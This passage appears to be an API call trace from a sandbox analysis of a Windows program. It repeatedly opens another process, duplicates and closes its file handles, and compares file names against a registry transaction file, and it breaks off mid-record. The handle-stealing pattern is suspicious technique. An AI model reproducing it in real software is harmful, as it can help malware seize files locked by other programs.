[0164.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.679] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.679] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.679] CloseHandle (hObject=0x1e4) returned 1 [0164.679] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0164.680] CloseHandle (hObject=0x194) returned 1 [0164.680] CloseHandle (hObject=0x1e8) returned 1 [0164.680] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.680] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x52c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.681] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.681] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.682] CloseHandle (hObject=0x1e4) returned 1 [0164.682] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0164.682] CloseHandle (hObject=0x194) returned 1 [0164.682] CloseHandle (hObject=0x1e8) returned 1 [0164.682] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.682] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x534, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.683] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.683] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.683] CloseHandle (hObject=0x1e4) returned 1 [0164.683] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0164.683] CloseHandle (hObject=0x194) returned 1 [0164.683] CloseHandle (hObject=0x1e8) returned 1 [0164.684] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.684] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x53c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.684] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.684] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.685] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.685] CloseHandle (hObject=0x1e4) returned 1 [0164.685] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0164.685] CloseHandle (hObject=0x194) returned 1 [0164.686] CloseHandle (hObject=0x1e8) returned 1 [0164.686] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.686] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x554, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.686] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.686] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.687] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.687] CloseHandle (hObject=0x1e4) returned 1 [0164.687] _wcsicmp (_Str1="\\thumbcache_32.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.687] CloseHandle (hObject=0x194) returned 1 [0164.688] CloseHandle (hObject=0x1e8) returned 1 [0164.688] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.688] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.688] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.688] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.689] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.689] CloseHandle (hObject=0x1e4) returned 1 [0164.689] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.689] CloseHandle (hObject=0x194) returned 1 [0164.689] CloseHandle (hObject=0x1e8) returned 1 [0164.690] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.690] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x58c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.690] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.691] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.691] CloseHandle (hObject=0x1e4) returned 1 [0164.692] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.692] CloseHandle (hObject=0x194) returned 1 [0164.692] CloseHandle (hObject=0x1e8) returned 1 [0164.692] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.692] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.692] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.693] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.693] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.694] CloseHandle (hObject=0x1e4) returned 1 [0164.694] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.694] CloseHandle (hObject=0x194) returned 1 [0164.694] CloseHandle (hObject=0x1e8) returned 1 [0164.694] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.694] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.694] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.694] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.695] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.695] CloseHandle (hObject=0x1e4) returned 1 [0164.695] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.695] CloseHandle (hObject=0x194) returned 1 [0164.696] CloseHandle (hObject=0x1e8) returned 1 [0164.696] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.696] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.696] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.697] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.701] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.701] CloseHandle (hObject=0x1e4) returned 1 [0164.701] _wcsicmp (_Str1="\\wdmaud.drv.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.701] CloseHandle (hObject=0x194) returned 1 [0164.701] CloseHandle (hObject=0x1e8) returned 1 [0164.701] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.701] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.701] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.702] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.703] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.703] CloseHandle (hObject=0x1e4) returned 1 [0164.703] _wcsicmp (_Str1="\\MMDevAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.703] CloseHandle (hObject=0x194) returned 1 [0164.703] CloseHandle (hObject=0x1e8) returned 1 [0164.703] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.703] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x654, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.703] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.704] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.705] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.705] CloseHandle (hObject=0x1e4) returned 1 [0164.705] _wcsicmp (_Str1="\\bthprops.cpl.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0164.705] CloseHandle (hObject=0x194) returned 1 [0164.705] CloseHandle (hObject=0x1e8) returned 1 [0164.705] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.705] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x664, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.705] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.709] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.710] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.710] CloseHandle (hObject=0x1e4) returned 1 [0164.710] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.710] CloseHandle (hObject=0x194) returned 1 [0164.710] CloseHandle (hObject=0x1e8) returned 1 [0164.710] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.710] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x69c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.710] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.711] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.712] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.712] CloseHandle (hObject=0x1e4) returned 1 [0164.712] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.712] CloseHandle (hObject=0x194) returned 1 [0164.712] CloseHandle (hObject=0x1e8) returned 1 [0164.712] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.713] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.713] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.713] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.714] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.714] CloseHandle (hObject=0x1e4) returned 1 [0164.714] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.714] CloseHandle (hObject=0x194) returned 1 [0164.715] CloseHandle (hObject=0x1e8) returned 1 [0164.715] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.715] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.715] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.715] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.716] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.716] CloseHandle (hObject=0x1e4) returned 1 [0164.716] _wcsicmp (_Str1="\\msctf.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.716] CloseHandle (hObject=0x194) returned 1 [0164.716] CloseHandle (hObject=0x1e8) returned 1 [0164.716] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.716] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.716] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.717] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.718] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.718] CloseHandle (hObject=0x1e4) returned 1 [0164.718] _wcsicmp (_Str1="\\thumbcache_idx.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.718] CloseHandle (hObject=0x194) returned 1 [0164.718] CloseHandle (hObject=0x1e8) returned 1 [0164.718] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.719] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.719] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.720] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.720] CloseHandle (hObject=0x1e4) returned 1 [0164.720] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.720] CloseHandle (hObject=0x194) returned 1 [0164.720] CloseHandle (hObject=0x1e8) returned 1 [0164.720] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.720] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.720] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.721] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.722] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.722] CloseHandle (hObject=0x1e4) returned 1 [0164.722] CloseHandle (hObject=0x194) returned 1 [0164.722] CloseHandle (hObject=0x1e8) returned 1 [0164.722] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.722] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.723] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.724] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.724] CloseHandle (hObject=0x1e4) returned 1 [0164.724] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.724] CloseHandle (hObject=0x194) returned 1 [0164.724] CloseHandle (hObject=0x1e8) returned 1 [0164.724] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.724] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.724] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.725] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.726] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.726] CloseHandle (hObject=0x1e4) returned 1 [0164.726] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0164.726] CloseHandle (hObject=0x194) returned 1 [0164.726] CloseHandle (hObject=0x1e8) returned 1 [0164.726] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.726] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.727] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.727] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.728] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.728] CloseHandle (hObject=0x1e4) returned 1 [0164.729] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0164.729] CloseHandle (hObject=0x194) returned 1 [0164.729] CloseHandle (hObject=0x1e8) returned 1 [0164.729] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.729] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x854, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.729] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.730] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.730] CloseHandle (hObject=0x1e4) returned 1 [0164.730] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.730] CloseHandle (hObject=0x194) returned 1 [0164.731] CloseHandle (hObject=0x1e8) returned 1 [0164.731] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.731] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x87c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.731] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.732] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.732] CloseHandle (hObject=0x1e4) returned 1 [0164.732] _wcsicmp (_Str1="\\netshell.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -15 [0164.732] CloseHandle (hObject=0x194) returned 1 [0164.732] CloseHandle (hObject=0x1e8) returned 1 [0164.732] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.733] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x948, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.733] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.734] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: 